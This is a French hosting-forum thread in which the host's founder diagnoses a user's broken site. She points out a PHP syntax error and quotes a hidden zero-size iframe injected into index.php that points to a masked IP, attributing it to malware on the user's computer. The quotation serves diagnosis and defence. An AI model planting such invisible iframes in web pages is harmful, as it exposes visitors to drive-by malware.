Site Buger

Vous avez un soucis de développement et ce n'est pas du ressort de notre support ? N'hésitez pas à soumettre vos petits soucis de développement et à vous entre aider par la même occasion.
Fanatagag
Messages : 47
Inscription : 11 décembre 2013 à 18:39

Bonjours mon site icraftmybed.franceserv.com refuse de fonctionner alor que le FTP contiente les dossier abituels ? pouver vous m'aider
Inconnu
Cet utilisateur a supprimé son compte et n’existe plus.
Messages : 6340
Inscription : 29 décembre 2010 à 18:15

Bonsoir,

En effet, page blanche. Vous pouvez activer l'affichage des erreurs php à partir de votre interface de gestion.
Avatar de l’utilisateur
Elodie
Fondatrice / Responsable
Fondatrice / Responsable
Messages : 7937
Inscription : 2 avril 2010 à 20:14

Vous avez une question ? Posez-la de préférence sur le forum et si ça demande un contact plus instantané, n'hésitez pas à vous rendre sur le t'chat IRC. Si votre question est personnelle, contactez-nous directement.
Avatar de l’utilisateur
Elodie
Fondatrice / Responsable
Fondatrice / Responsable
Messages : 7937
Inscription : 2 avril 2010 à 20:14

Bonjour,

Je vois que vous avez toujours un problème de développement sur votre site dans votre fichier index.php à la ligne 55. Vous avez oublié l’accolade de fermeture de la balise PHP ">" après le point d'interrogation, ce qui devrai former au final ceci : ?>

Par contre, se trouve après cette moitié de balise PHP fermante, une iframe invisible vers une adresse IP en Ukraine d'un serveur dédié étrange ... j'imagine alors que votre fichier s'est déjà fait modifier par un virus (présent sur votre ordinateur) et qui ajoute une iframe automatiquement via votre client FTP :
<html><body><iframe src="http://82.118.***.***/?2" width="0" height="0" align="none"></iframe><iframe src="http://82.118.***.***/?2" width="0" height="0" align="none"></body></html>>
Vu que votre site ne fonctionne pas et est susceptible de proliférer un virus (même si actuellement l'adresse intrusive mène vers une page 404), je met tout de même hors ligne votre site, le temps que vous corrigiez le problème.

N'hésitez pas à revenir vers moi pour plus d'informations.

Je déplace ce sujet de discussion dans la partie développement, vu que normalement ça ne relève pas du support technique.
Vous avez une question ? Posez-la de préférence sur le forum et si ça demande un contact plus instantané, n'hésitez pas à vous rendre sur le t'chat IRC. Si votre question est personnelle, contactez-nous directement.
Répondre